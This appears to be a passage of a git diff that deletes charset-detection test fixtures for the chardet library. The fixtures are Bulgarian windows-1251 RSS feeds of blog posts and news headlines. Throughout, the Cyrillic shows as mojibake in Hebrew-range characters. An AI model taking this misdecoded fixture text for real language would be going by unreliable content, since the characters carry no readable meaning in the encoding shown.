סנאגםוםטו ס םמשםטעו םט סןמנמגו חא ֲָׁ ט ךאןטעאכטחלא. ֿמסכו סו ןמנאחץמהטץלו טח למנסךאעא המ המךעמנא ט סו ןמןנטבנאץלו הא ןטיםול ןמ והםמ-הגו ט הא סו םאסןטל. ֽא נאחגטהוכגאםו לטהטעו ןמטסךאץא הא טחכטחאע מע ןמםו הגו לוסעא םא עכמעמ לט, ענבגא הא גםטלאגאל ס עוזךטעו ץנאםט, ךמדאעמ סתל םא נאבמעא, קוסעמ םלאל גנולו הא ץאןגאל ט סתל ןנוהטלםמ םא ךאפו ט גמהא (דמנךטע לט ךמנול). -ֽוהוכעא סו םאסןאץ, ףסןץ הא מעסךמקא המ והםמ חאגוהוםטו, ךמכךמעמ הא סט ךאזא חהנאסעט ס משו הגאלא זמנמגצט ט ענבגארו הא סו ןתעףגא חא ׁמפט. ױגאםאץלו והטם אגעמבףס םא ֵעאן (בטכועטעו חא גנתשאםו סט דט ךףןטץלו גהםאדא סכוה סכטחאםועמ םט גתג ֲאנםא, חאשמעמ םלארו חא גנתשאםו םא סמפטיסךאעא), ןתעףגאםועמ םא חאהםאעא סוהאכךא םו ו מפונעא, ןמנאהט םךאךגט ןנטקטםא ךכטלאעטךא םו נאבמעורו םוןנוךתסםאעמ ט בורו עוזטקךמ. ְח סו סץגאםאץ מע םוףהמבםטעו סוהאכךט, א פטכלטעו םו למזאץלו לםמדמ הא דט נאחבונול, בץא םאלאכטכט חגףךא, א סףבעטענטעו םו למזוץלו הא דט פמךףסטנאלו. ֲטהץלו, קו טלא ךאלונא, מעןנוה םא אגעמבףסא, לםמדמ המבנא טהו, םמ בורו ןףסםאעא סאלמ חא 2 לטםףעט, ךמכךמעמ הא םט ןמהנאחםט. -ָחםוםאהאץ סו מע סעףהא ג ׁמפט, םמ ץגאםאץ לאנרנףעךא ט מהטסועא ןנטךכ‏קט. -ָחגמהט: -ּנאח הא ןתעףגאל ןמגוקו מע הגא קאסא ס אגעמבףס. -ֽו סט חאסכףזאגא הא סו ןתעףגא עמכךמגא לםמדמ חא והטם-הגא הםט ןנוסעמי. -ֲטהץ למנועמ, םמ סאלמ עמכךמגא, הנףד ןתע ענבגא ןמםו הא דמ ןטןםא. -׀אחםמצגועםמעמ מסגועכוםטו ג ּמנסךאעא דנאהטםא לט ץאנוסא לםמדמ, מסמבוםמ כטכאגמעמ. -ֲאנםוםסךטעו עאךסטעא סא ןמ-סךתןט מע סמפטיסךטעו. -40 ךטםעא סא לםמדמ חא ןתע המ ֲאנםא, ןנוךאכוםמ לםמדמ סא, ץול סו דתנקטר, ץול סט ןכאשאר. -ֳורא ןנמהתכזאגא הא ו םוסונטמחום ג םךמט מעםמרוםט. -ְךמ ןנמהתכזאגאל עאךא, שו ענבגא הא דון טהועא חא נףבנטךא ֳמנו-המכף. - http://ecloga.cult.bg/log/index.php?p=250 - - - ׂוזךמ ו, םאטסעטםא ;) - ִתנזויךט דמנושמ ךאפו ט דמנוש ו100 (‏בטכוום גסו ןאך), משו םונאחןוקאעאם, געףנםאכ סתל סו הא סט מןנאגל באךטיךטעו, הםוס ךמכודטעו ןמלאדאץא ג ןוקאעםטצאעא חא הא טחכוחול, א אח םא והםמ סןטסאםטו הא סו ןנולוסעט חאה דתנבא לט ט הא לט גהטדאע רףל ןנוח צכאעא, סכוהגאשא, סוהלטצא. ִאםמ םו סו גתנםא לםמדמ טחסעטסךאם מע ןנאחםטצטעו, קו עאחט גוקונ םלא הא סלמדםא הא טל מןנאג גסטקךטעו ןנמבכולט. ׳ףה סו חאשמ גסטקךט סט לטסכע, קו סטסעולום אהלטםטסענאעמנ מחםאקאגא מע ץאלאכטם המ עוכופמםום עוץםטך, ןמםךמדא ו עוזךמ הא ןמלאדאר םא גסטקךט, מסמבוםמ ךמדאעמ עו טחמסעאגע ג באךטיךט, םמ ךאךגמ הא סו ןנאגט. אעמ חא ךאןאך סא לט ךףןטכט לנוזמג ךאבוכ, םמ םו ו ךנטלןםאע, א פטםאםסטסעךאעא ו ג מעןףסך, םאןנאגמ ףזאס, א ףז טל בץא םאןטסאכט םא כטסעקו (גוקו שו סו נאחןכאקא מע ףזאס). ֿמזוכאיעו לט 3 ףסןורםט ןמקטגםט הםט ט צכא סכוהגאשא סוהלטצא הא נורא ןנמבכולטעו, א עו םו סא לאכךמ. ׳ףה סו ךמדא כט םאי-םאךנא שו לט מסעאםו גנולו הא סו מעהאל םא הולמםא, סטלגמכ םא מןונאצטמםםאעא סטסעולא, ךמעמ שו טחןמכחגאל חאםאןנוה, םאנוה ס ןטםדגטםסךאעא. ַגףקאע ךמםצונעט םא נאפעגונך ט עמגא לאכךמ לו מבמהנגא. -ֿנוהןמכאדאל, קו םלא הא בכמדגאל עוחט הםט, חאעמגא למדא הא קוסעטע םא גסטקךט, ךמטעמ ףענו טלאע ןנאחםטך. - http://ecloga.cult.bg/log/index.php?p=249 - - - ֳונדמגהוםסךמ, והםמ עאךמגא - ִםוס ענבגארו הא בתהו המסעא םאןוקום הום, םמ לאי לט סו נאחלטםא, סכוה 16 למזו ט הא סעאםו םאןוקוםמ. -ףןטץ סט ךו ט ןמסכו סתזאכטץ, קו םו סתל גחוכ ןמגוקו ןאנט, ץאנוסאץ סט נאםטצא, א לט ענבגאץא ט חא בטכוע המ ֲאנםא. ׀אםטצא ענבגא הא סט ךףן, טםאקו םלא הא טלא ס ךאךגמ הא ןתעףגאל, א סתל מבושאכ הא סתל גתג ֲאנםא. ־בושאכ סתל מע ענט דמהטםט הא מעטהא ט םאי-סועםו סו םאךאםטץ, האםמ םטשמ םו לט ןמןנוקט הא סעטדםא ףענו ג למנסךאעא סעמכטצא, האםמ הא ףסןו הא סו גטה ט ס ןמגוקו ץמנא, קו ךמי חםאו ךמדא ןאך שו למדא, םמ םוךא םו דמגמנ ןנוהגאנטעוכםמ, גסו משו סתל ג ׁמפט ט לו קאךא נאבמעא. נאזבאעא םא נאםטצאעא לט לטםאכאעא סוהלטצא סט סו מךאחא עוזטקתך ףהאנ גתנץף ןכאםמגועו לט, הםוס סט ןנמכטקא, א שו סט ןנמכטקט ט ןמ-םאעאל, משו םו סתל סט ךףןטכ חאץנאםגאםו ןמנאהט כטןסא םא ןאנט, עמ ךמו ןמ-םאןנוה ט ג ךנאיםא סלועךא נאחץמהטעו סו ףגוכטקטץא, בוהםא ט םוםמנלאכםא סענאםא סלו, זטגוול זטגמע םאחאול. - http://ecloga.cult.bg/log/index.php?p=248 - - - ׃פ-ףפ - ׂוחט הםט סא םאןנאגמ ךמרלאנםט חא לום, אהסךט סתל םאעמגאנום ט סו םאהגאל הא סט ןמקטםא לאכךמ ג ךנא םא סוהלטצאעא, םמ סכוהגאשאעא ןנמהתכזאגאל. ֽאןנאגמ סו קףה האכט "ּמע זטגמע סנוה טםהטאםצטעו" םו ו ןמהץמהשמ חאדכאגטו חא עמחט בכמד ;) - http://ecloga.cult.bg/log/index.php?p=247 - - - ֿנאחםטצט - ֿנאחםטצטעו םו גטםאדט סא םאקטם חא ןמקטגךא, סולויםטעו מסמבוםמ. ׁאלמעמ גמסךנוסוםטו, טחךאנאץלו קףהוסםמ, גתןנוךט קו ןמןאהםאץ םא לוםעו ׁמבטוסךט מע 1 כטעתנ ט סףענטםעא בורו סענארםמ, גטםאדט ענבגא הא סו דכוהאע ועטךועטעו, גךףסתע בורו םא םושמ סנוהםמ לוזהף ׂתנדמגטשו ט װכטנע. -ֽאי-םוןנטעםמעמ סא סולויםטעו מבוהט, םוןנטעםמעמ ו, קו באבטעו ט ההמגצטעו טסךאע הא מבהגאע מךמכמ 12-13 ט הא סןע סכוהמבוהום סתם, א אח ג עאךטגא למלוםעט סט כדאל מךמכמ 5-6 ט לט טהגא םאםאדמנםמ הא סעאםא חא מבה. ֽוהמסןטגאםועמ ו ףזאסםמ, םא גסטקךמעמ מעדמנו, גקונא טלארו ןנמבכול ס והטם סףטעק םא ןמךנטגא ט סכוה ךאעמ המיהו עוץםטך, סתסוהטעו ךמטעמ טלאע ךכ‏ק מע ןמךנטגא סו םאןנאגטץא םא כףהט, טלאל עתנךאםט ס עוץםטעו סגמוגמכםט ןנמגט חא גסטקךמ ט סתל דט מעובאכ, סתמעגועםמ עו, לום, לאי ענבגא הא דט ןמסןכארא לאכךמ. אךעמ ט הא ו, נורוםטועמ בורו הא סו גחולו ךכ‏ק ט הםוס, סףענטםעא הא המיהאע ט הא ןףסםאע ךאבוכט ןנוח הנףדמ ףסענמיסעגמ. ּמלקועאעא סט סגתנרטץא נאבמעאעא לםמדמ המבנו, וגאכא םא ּודאכאם, המסודא סא בטכט לםמדמ עמקםט, ךאעמ טחךכ‏קטל לאכךמ סךמנמסעטעו, םמ ןנוהןמכאדאל, קו אךמ טלאל גנולו הא דט עוסעגאל ןמ-מברטנםמ ט טל סו מבאה, שו סו מןנאגע ט ס עמגא, חאסודא לו ףסענמיגאע. ׁודא ‏נךאל הא לט סו סלוםע ךכ‏קאכךטעו םא נאבמעא ט הא םלא ןמגוקו ךנאזבט (טסךנוםםמ סו םאהגאל). -ׁךמנמ סט דמגמנטץ ס נאחכטקםט ץמנא, קו גטעאו והםא מסמבוםא אדנוסט ט חכמבא גתג גתחהףץא, ץמנאעא סא בוהםט, ףלמנוםט ט מחכמבוםט, ףןנאגכגאשטעו סא ןנוךאכוםמ אכקםט ט םו לטסכע, קו אךמ מעןףסםאע לאכךמ ןמגוקו םא ץמנאעא שו טלא חא גסטקךט. ֲ ְׁ סו ףןנאגכגאע כוסםמ, חאשמעמ סא הובוכט ט המגמכםט, טלא חא גסטקךט, א םאי-כוסםמ סו לאםטןףכטנא המגמכום םאנמה, א עמי םו טסךא עמכךמגא לםמדמ, קו הא ו םוןמסעטזטלמ. ֿנוהקףסעגאלו, קו סךמנמ שו טלא המסעא ףכטקםט טחסעתןכוםט ט למזו בט דנאזהאםסךט סבכתסתצט, דמנו-המכף סו סכףקגאע ןנוח 8 דמהטםט. ֿנמסעמ סו ףסושא גתג גתחהףץא. - http://ecloga.cult.bg/log/index.php?p=246 - - - ֵהטם ףזאסום הום - ִםוס ןנמהתכזטץ במנבאעא ס םוןמסכףרםטעו ךמלן‏ענט ג מפטסא ט ןמםוזו צכ הום םו סתל סט ג סעאטקךאעא סו סכףקט והםמ דמכלמ םושאסעטו. ֽךמי סו ו םאלתךםאכ ט לט ו מעךנאהםאכ נאםטצאעא ס ךועמ, עופעונטעו, ראןךאעא, ךכ‏קמגועו, חאנהםמעמ חא עוכופמםא, הטסךמגו (םךמט םו למדא הא סט דט םאבאג כוסםמ), ךמלןכוךע מעגונעךט ט חםאל כט ט אח ךאךגמ משו. ֽו. ׂמגא ו ךמרלאנ ןנמסעמ. ׂףך ףז םו סו ךנאהו, םו סו ךנאהו, אלא סו ךנאהו. ֿמהמחטנאל, קו ו הוכמ םא םךמי ךףנטונ טכט ךכטוםע םא ֱטךאל טכט ְיׂטֲט ֿאנעםונ. ּאלךא לף, האםמ דמ סןמכועע סתשטעו לתךט, ךמטעמ לט ןנטקטםגא. - - http://ecloga.cult.bg/log/index.php?p=245 - - - ׂאךא ו עמ - אחאץ, קו הםוס םו לו סגתנעא ט נאחםט ץמנא סו מגטנףסטץא, עא סלוםל אםעטגטנףסםטעו, ֽמנעתם הא דמ הףץאע. ־ןנאגטץ כאןעמןא םא דכאגםט נוהאךעמנ ט משו סו למעאל ס ךכטוםעסךטעו ךמלןמגו, םאהגאל סו ןמםו גוקונעא הא םו סגתנרט סךףקםמ, גוקו לט סו שו הא ףהאנ 1-2 דמכולט ט הא סו ןממעןףסםא. - http://ecloga.cult.bg/log/index.php?p=244 - - - ׁבתנךאםט טסעמנטט - ׁםמשט, סכוה נאבמעא סו םאלתךםאץ ג ּאקף ןטךקף הא ןנמבגאל ךאך ו כאעטםמאלונטךאםסךאעא ךףץם. ־ןנוהוכוםמ לט ץאנוסא, םמ בורו אהסךט רףלםמ ט דכאגאעא לט ךתםעורו. ֽא לאסאעא סו םאסעאםטץא והטם נתב ט והםא המסעא ןנטעםא זוםא, סכוה טחגוסעםמ גנולו נתבתע סו גתנםא ס הנףדא המסעא ןנטעםא זוםא ט גוקו סתגסול לו ףקףהט. ֲ דכאגאעא לט סו חאדםוחהט לטסתכעא, קו םמגמהמרכאעא זוםא לט ו לםמדמ ןמחםאעא, םמ םו למזוץ הא סו סוע מעךתהו. אךעמ ט הא ו, למזו הא ו ןנטכטקאכא ןמ טחנאזוםטו, זוסעמגו ט גסטקךמ םא םךמ ןמחםאעא. -ׂאחט סףענטם לאי ןנוסןאץ, מעךאךעמ סתל םא נאבמעא םו לו סגתנעא םא והםמ לסעמ, םאמבטךמכטץ נאחםט ןמענובטעוכט ט ןמסגתנרטץ עמגא-מםמגא, משו םו למדא הא סו ךנמעםא ט סטדףנםמ שו סט םאלונ משו נאבמעא, םו קו סט םלאל, םמ םו לט סו חאםטלאגא ס ףוב טםעונפויסטעו םא לויכא, ךמיעמ סט םאןנאגטץ םא לארטםאעא. ֲסתשםמסע טלאל הא ןנאג ט סעאנתן סךנטןעמגו, טחדכוזהא שו סו נאחעאךאגאל המסעא גנולו ט שו קאךאל ּטכום, עמי סןמלוםא םושמ חא קונןוםו הםוס, גמהךא לט סו ןטיגא םא לום, א סו סושאל, קו מקאךגאל הא ןנטסעטדםו והםא ג סךמנמ גנולו. ָחדכוזהא, קו ןועתך שו ו ג קועגתנעתך, מבחוכמ לו ו םךאךגמ סענאםםמ ןנאחםטקםמ םאסענמוםטו, םמ ט םו סאלמ לום, מעעאעתך טלא משו גוסוכט ךמכודט. גםמ הםוס ו הום חא המבנמ םאסענמוםטו. - http://ecloga.cult.bg/log/index.php?p=243 - - - ּאלךא טל םא טםעוכ - ׁםמשט נורטץ הא סו במנ םא הגא פנמםעא, ןממןנאגץ ךמלןא םא מפטס לוםטהזתנא, עא ךאעמ סתל עאל סו חאוץ ס והטם סעאנ ןנמבכול, חגףךמגאעא ךאנעא םא והטם ךמכודא. ֿנוהט בץ בףףעםאכ םמןטךס חא הא גטה ס ךאךגמ זטגמעםמ סט טלאל נאבמעא, מךאחא סו אףהטמ ךמהוך 97 םא טםעוכסךט קטןסוע, נאחנאבמעום מע ְגאםס כמהזטך. ׂמגא המבנו, םמ ֿנמחמנצט 98 םלאע ןמההנתזךא חא עאךמגא םושמ, גתןנוךט, קו ו אהסךט נאחןנמסענאםוםמ, עמגא םושמ םלא ןמההנתזךא מע לאכךמלוךטעו. ֿנוסכףראץ סענאםטצאעא םא ָםעוכ, עאל סאלמ הועמ םו לט ןמךאחאץא סנוהום ןנתסע. ֿנונמגטץ ט דףדתכא, םמ ןמגוקועמ טםפמנלאצט סו חאךכ‏קאגארו ג םאלטנאםו םא ןנמטחגמהטעוכ םא התםםאעא ןכאעךא, מעעאל גוקו ענבגא הא טלא ןמההנתזךא, אח ןמםוזו סתל לתנחוכטגמ ךמןוכו סו גתחהתנזאץ מע מעגאנםו םא ךףעטעא. ֿנטבדםאץ המ זמךונא "מבאהט סו םא ןנטעוכ", ןנטעוכטעו... םאי-גאזםמעמ םושמ םא סגועא סא, גנגאל ג עמגא. ׂנאםספונטנאץלו מךמכמ 40 לודאבאיעא סתס סךמנמסע מךמכמ 5ב ג סוךףםהא מע ֲאנםא המ ׁמפט (ֱׂ הא דמ הזגאךאע, לנתסםט לטחונםטצט, 8ב תןכמףה ס ְִֻׁ, טלאע הא האהאע, םמ דכוהאע הא ןוקוכע םא דתנבא םא טחסענאהאכט ןמענובטעוכ םא דנמחםטעו טל םוהמךכאעוםט ףסכףדט). ׁודא ןמםו סט טלאל גסךאךגט טםעוכסךט הנאיגונט ג אנץטג םא ףובסתנגתנא. -ׂמךף-שמ ןמכףקטץ ט מבאזהאםו מע המגמכםט ןמענובטעוכ. ֲאזםמעמ ו גסטקךט הא סלו המגמכםט. - http://ecloga.cult.bg/log/index.php?p=242 - - - diff --git a/chardet/tests/windows-1251-bulgarian/ide.li.xml b/chardet/tests/windows-1251-bulgarian/ide.li.xml deleted file mode 100644 index 59eae89..0000000 --- a/chardet/tests/windows-1251-bulgarian/ide.li.xml +++ /dev/null @@ -1,80 +0,0 @@ - - - - - - - -ָהו.כט? -http://ide.li/ -ָהו.כט? - חא בתכדאנטעו ןמ סגועא -bg_BG - - -ֽוכודאכום גםמס םא ךטעאיסךט ךאלט ט םמזמגו מע ֱתכדאנט ג ׂףנצט -http://ide.li/article1050.html -ַאסטכוםאעא ג ןמסכוהםמ גנולו ףןמענובא םא ךאלט ט םמזמגו מע ףקוםטצט ט לכאהט ץמנא ט גסו ןמ-קוסעמעמ טל טחןמכחגאםו טל ןנט סגאהט ט חא םאנאםגאםט ןמנאזהאע סונטמחםט ענוגמדט ג ׂףנצט. - - - -ׁעופאם ִאםאטכמג םא עג-וךנאםא ג ָעאכט -http://ide.li/article1049.html -ֱתכדאנסךטע לטםטסעתנ םא ךףכעףנאעא ו םא וךנאםטעו םא טעאכטאםסךאעא עוכוגטחט, ךמעמ ןףסםא סונטאכ ס םודמגמ ףקאסעטו. - - - -ֲ ְׁ: ׁתהע םאר דטלםאסעטך חא טחםאסטכגאםו םא 13-דמהטרםא -http://ide.li/article1048.html -39-דמהטרםטע בתכדאנטם ו בטכ אנוסעףגאם ןנוהט קועטנט הםט ג ָיסע ׀מקוסעתנ; עמי ו ףגאזאגאם ענוםמנ ג דנאהא, ףעמקםגאע לוסעםט לוהטט. - - - -ֶטגמעתע ךנאי ּתנעגמ ּמנו -http://ide.li/article1047.html -ֽא לטםףעט ןתע מע ךףכטעו םא גטסמךטעו סדנאהט םא ׂוכ ְגטג, דנמחהמגועו אםעוםט םא עוכוךמלטעו, דתכקאגאעא םא ראנוםטעו ףכטצט, דמנו-המכף המבנו ןמחםאעאעא צטגטכטחאצט סתס חארולועגאשמ וךחמעטקםמ כטצו ט ןףכסא םא סכמזםמ ןנוןכועוםטעו לאדטסענאכט ןויחאזא נחךמ סו ןנמלום, םאגכטחאיךט ג נאימםא םא ּתנעגמ ּמנו. - - - -ׁתהובםמ הוכמ סנושף ֽ־ָ -http://ide.li/article1046.html -ֲ םאקאכמעמ םא הוךולגנט 2005, ףקאסעםטצטעו ג ְךצטעא ןנמעטג חאהתכזטעוכםמעמ חהנאגםמ מסטדףנגאםו ןמ דנאזהאםסעגמ דכאסףגאץא לאםהאע םא ֱׁׁ ֱתהושו הא דט ןנוהסעאגכגא ןנוה בתכדאנסךטעו גכאסעט ט הא חאגוהו מע עץםמ טלו סתהובםמ הוכמ סנושף התנזאגאעא חא הטסךנטלטםאצט םא באחא דנאזהאםסעגמ, םוןנאגמלונםמ טחןמכחגאםו םא כטקםט האםםט מע ַֽ־ ט ףקאסעתךמגט כוךאנט, ךאךעמ ט חא מבטהט ט ךכוגועט מעןנאגוםט מע ןנוהסעאגטעוכט םא בתכדאנסךאעא התנזאגא ךתל בתכדאנטעו זטגוושט ג קףזבטםא. - - - -־עךנטעא םמגמדמהטרםא ךאנעטקךא -http://ide.li/article1045.html -ִמ בתכדאנסךטעו הוןףעאעט ט ןמכטעטצט מע ףןנאגכגאשטעו ןאנעטט ט מע מןמחטצטעא. - - - -ׁלורםמעמ, ענאדטךמלטקםמעמ ט מעךנמגוםמ טהטמעסךמעמ, טכט ףנטמחט 2005 -http://ide.li/article1044.html -ֲ םאגוקונטועמ םא ֽמגא דמהטםא אדוםצט "װנאםס ןנוס" ןףבכטךףגא ענאהטצטמםםט סט סןטסתך ס ךףנטמחםט סכףקךט מע ןמסכוהםטעו 12 לוסוצא. - - - -ִגמכסךטע למסע ג ׀מהמןטעו סגתנחגא הגא סגעא -http://ide.li/article1043.html -ׂמי ו ךאעמ מדנמלםא קונםא ןמהךמגא םאה נוךאעא, סךאר ןאהםאכא מע מסלמסא, ס ךאהנט מע םודמ חאןמקגא "ֲנולו נאחהוכםמ". - - - -ֿנוגמהאק םא גנולו ט ןנמסענאםסעגמ -http://ide.li/article1042.html -(ֽושמ ךאעמ נאחךאח. ִא סו עתכךףגא, ךאךעמ קטעאעוכע םאלונט חא המבנו.) <br /> -<br /> -ֵהטם קמגוך גתנגורו ןמ ףכטצטעו םא ׳טךאדמ. ֽוןמחםאע, מהתנןאם ט לנתסום, בףהוש והםמגנולוםםמ ןמהמחנוםטו ט סתקףגסעגטו, סענאץ ט סתזאכוםטו. ֲ נתצועו סט התנזורו סענאםםא ךףעט – למזו בט כאעונםא? ֽו, םו בורו כאעונםא. ֲסתשםמסע עאחט ךףעט םו סכףזורו םטךמלף חא םטשמ. ׂ ןנמסעמ סט גטסורו בוחןמלמשםמ ג נתצועו םא סךטעםטךא, ןתכםא המדמנו ס םךאךגט ץאנעטיךט, ךמטעמ כוזונםמ ןאהאץא ןמ טםאקו טהואכםמ קטסעט ןתע. - - - -־בטהםמ ו לאיךאעא נמהטםא הא סו ןנוגנתשא ג לאשוץא -http://ide.li/article1041.html -ְדנוסטגםטע ףךנאטםסךט םאצטמםאכטחתל ןנוקט םא גתחנאזהאםועמ םט ג ֱוסאנאבט, ךאחגא ועםטקוסךטע בתכדאנטם ָגאם ֿמכמגם‏ך. - - - - \ No newline at end of file diff --git a/chardet/tests/windows-1251-bulgarian/informator.org.xml b/chardet/tests/windows-1251-bulgarian/informator.org.xml deleted file mode 100644 index f27ad67..0000000 --- a/chardet/tests/windows-1251-bulgarian/informator.org.xml +++ /dev/null @@ -1,68 +0,0 @@ - - - - - - - -ָֽװ־׀ְּׂ־׀ -http://www.informator.org/html -ָֽװ־׀ְּׂ־׀ -bg - - -׀ְְׂ ֱֱָָֻ ְֽ ֿ׀־ֳ׀ְְָּׁׂ -http://www.informator.org/html/modules.php?name=News&file=article&sid=184 - - - -ֲתןנמס םא ןנמסעא כמדטךא -http://www.informator.org/html/modules.php?name=News&file=article&sid=183 - - - -ִאםטוכ ִופמ -http://www.informator.org/html/modules.php?name=News&file=article&sid=182 - - - -ֽארועמ ןנאגמ םא כ‏במג -http://www.informator.org/html/modules.php?name=News&file=article&sid=181 - - - -ַא ךאךגמ זטגו? -http://www.informator.org/html/modules.php?name=News&file=article&sid=180 - - - -ָח “ֿתעףגאםו ךתל סובו סט” ֱכ. ִטלטענמגא -http://www.informator.org/html/modules.php?name=News&file=article&sid=177 - - - -ִא חאןמקםור סמבסעגום בטחםוס - מןמחםאי סובו סט ט ןנאגטכאעא לף -http://www.informator.org/html/modules.php?name=News&file=article&sid=176 - - - -ׁענאעודט םא פטנלאעא- חםאול כט ךאךגמ טסךאלו, ךתהו מעטגאלו ט ךאך דמ ןמסעטדאלו? -http://www.informator.org/html/modules.php?name=News&file=article&sid=175 - - - -ָםפמנלאצטעא - ןמ סתשוסעגמ -http://www.informator.org/html/modules.php?name=News&file=article&sid=174 - - - -ֿמכחגאיעו ןכאזםמ לאסכמ -http://www.informator.org/html/modules.php?name=News&file=article&sid=173 - - - - \ No newline at end of file diff --git a/chardet/tests/windows-1251-bulgarian/linux-bg.org.xml b/chardet/tests/windows-1251-bulgarian/linux-bg.org.xml deleted file mode 100644 index 20b2b98..0000000 --- a/chardet/tests/windows-1251-bulgarian/linux-bg.org.xml +++ /dev/null @@ -1,97 +0,0 @@ - - - - - - - - ֻטםףךס חא בתכדאנט: ֽמגטםט - http://www.linux-bg.org - Welcome to Linux-bg : Everything you need for Linux in Bulgarian! - Your guide from the beginning till the end. - - bg - (PICS-1.1 "http://www.classify.org/safesurf/" 1 r (SS~~000 1)) - Copyright 1999-2004, Slavei Karadjov - slaff@linux-bg.org - support@linux-bg.org - - - - - www.linux-bg.org - http://www.linux-bg.org/ads/linux-bg4.gif - http://www.linux-bg.org - 88 - 31 - ֻטםףךס חא בתכדאנט - - - -׳וסעטעמ םמגמ הנמ - 2.6.15 -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378765283 - - -ׁגמבמהםטע סמפעףונ ךאעמ סמצטאכםמ הגטזוםטו -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378676431 - - -בטכויםא גונסט םא GIMP -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378652973 - - -ֿמנוהםא וךסצוסט םא RIAA -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378602737 - - -NetBSD 3.0 -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378503192 - - -ָחכוחו OpenOffice.org 2.0.1 -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378422321 - - -׃וב ׂוץ שו סו ןנמגוהו ןנוח כעמעמ -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378392594 - - -X11R7 & X11R6.9 סא גוקו םא בכ סגע -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378403131 - - -ַטלםא טחםוםאהא ג SUSE Linux 10 -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378384750 - - -Qt 4.1 -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378383905 - - -ֿנמוךעתע Seti@HOME סןטנא הא סתשוסעגףגא -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378357534 - - -ִוכודטנאםו םא access ןמכטעטךט ג Postfix -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378356724 - - -IBM האנט GPFS -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378332641 - - -ׁתם מסגמבמזהאגא BrandZ סמפעףונא -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378326293 - - - - - 1 - - - - diff --git a/chardet/tests/windows-1251-bulgarian/rinennor.org.xml b/chardet/tests/windows-1251-bulgarian/rinennor.org.xml deleted file mode 100644 index 196e08d..0000000 --- a/chardet/tests/windows-1251-bulgarian/rinennor.org.xml +++ /dev/null @@ -1,98 +0,0 @@ - - - - - - - -ׂמכךטם ךכףב ׀טם ֵםםמנ -http://www.rinennor.org/ -ׂמכךטם ךכףב ׀טם ֵםםמנ -bg - - ׂמכךטם ךכףב ׀טם ֵםםמנ - http://www.rinennor.org/images/logo.gif - http://www.rinennor.org/ - -webmaster@rinennor.org - -ֿאכאעךט + ְֻ׀ֿ - 13-14 אגדףסע -http://www.rinennor.org/modules.php?op=modload&name=News&file=article&sid=125 - -13 ט 14 אגדףסע (סתבמעא ט םוהוכ), ךנאי סוכמ ֱאכרא (םא 1 קאס ןתע מע צוםעתנא םא ׁמפט), ג והטם המכ ס ןמעמך (ךמיעמ שו טלא קוסעעא הא בתהו גוכטךט ְםהףטם). <br /> -<br /> -ֿאכאעךט ... - - -מםךףנס חא ֳמעגאנסךא נוצוןא מע סגועא םא ׂמכךטם -http://www.rinennor.org/modules.php?op=modload&name=News&file=article&sid=122 - -ׁךתןט ןנטעוכט, <br /> -ִמיהו גנולו הא סגאכטל ןנארטעו המסןוץט, הא טחגאהטל ןנטבנאםטעו עוםהזונט, עטדאםט ט ןנמקטו דמעגאנסךט ןמסמבט, הא חאןנועםול נתךאגט ט ןנוסעטכךט, ט הא ןמךאזול םא ךאךגמ סא סןמסמבםט ץמבטעטעו, ץמנאעא, הזףהזועאעא, וכפטעו, המנט מנךטעו, ךמדאעמ סעאםו הףלא חא ץנאםא! ... - - -ׂמכךטם װוסע 2005 -http://www.rinennor.org/modules.php?op=modload&name=News&file=article&sid=121 - -ֱתכדאנסךמעמ ׂמכךטם מבשוסעגמ טלא ףהמגמכסעגטועמ הא ןמךאםט גסטקךט ןמקטעאעוכט ט כ‏בטעוכט םא ןנמטחגוהוםטעא םא ִז. ׀. ׀. ׂמכךטם םא סנושא םא ךנתסעמןתע – ֱתכדאנסךטע ׂמכךטם װוסע, ךמיעמ שו סו ןנמגוהו םא 3, 4 ט 5 ‏םט ג חאכא “ׁתוהטםוםטו” םא ָסעמנטקוסךט לףחוי ג ֿכמגהטג. ֲץמהתע ו מעגמנום חא גסטקךט – וכאעו, גטזעו, ןנטסתוהטםועו סו. - - -מםךףנס םא עולא "ֿטסלמ המ ׁנוהםאעא חול" -http://www.rinennor.org/modules.php?op=modload&name=News&file=article&sid=120 - -׀אבמעטכםטצאעא םא ׃םטגונסטעוע ְנלוםוכמס ט ׂמכךטם סאיע ֵםהמנטמם מבגגאע כטעונאעףנום ךמםךףנס םא עולא "ֿטסלמ המ ׁנוהםאעא חול" חא ץףהמזוסעגוםמ ןנמטחגוהוםטו גתג פמנלאעא םא ןטסלמ. <br /> - - - -ֲ-ך ֽ־ְֲָֽ׀:"ִא זטגוור ג סגועא םא ׂמכךטם" - סעאעט חא מעךנטגאםועמ םא "ְנלוםוכמס" -http://www.rinennor.org/modules.php?op=modload&name=News&file=article&sid=119 - -ֲסועםטך "ֽמגטםאנ" מענאחט מעךנטגאםועמ םא ׃םטגונסטעועא "ְנלוםוכמס" ס מברטנםא סעאעט, ךמעמ גתןנוךט םךמט סגמט םוהמסעאעתצט ו סנוה םאי-ךמנוךעםטעו לוהטיםט ןנוהסעאגםט םא בתכדאנסךמעמ ׂמכךטם מבשוסעגמ ט ג קאסעםמסע םא "׀טם ֵםםמנ" . ֱכאדמהאנטל םא ְםדוכ ַאפטנמג.<br /> -<br /> -ֿנמקועועו סאלאעא סעאעט <a href="http://www.novinar.org/main.php?act=news&act1=det&sql=MTUyNTsxMA==&mater=MTUyNTszNQ==">עףך</a>.<br /> - - - -ֲאזםמ ןטסלמ םא ִז. ׀. ׀. ׂמכךטם םא עתנד ג ְגסענאכט -http://www.rinennor.org/modules.php?op=modload&name=News&file=article&sid=118 - -־סמבוםמ גאזםמ ןטסלמ םא ִז. ׀. ׀. ׂמכךטם שו בתהו ןנמהאהוםמ םא עתנד םא 10 פוגנףאנט 2005ד ג ְגסענאכט. <br /> -ֿטסלמעמ ו םאןטסאםמ ןנוח 1955 המ דמנוש ןמקטעאעוכ םא עגמנקוסעגמעמ םא ןטסאעוכ. <br /> 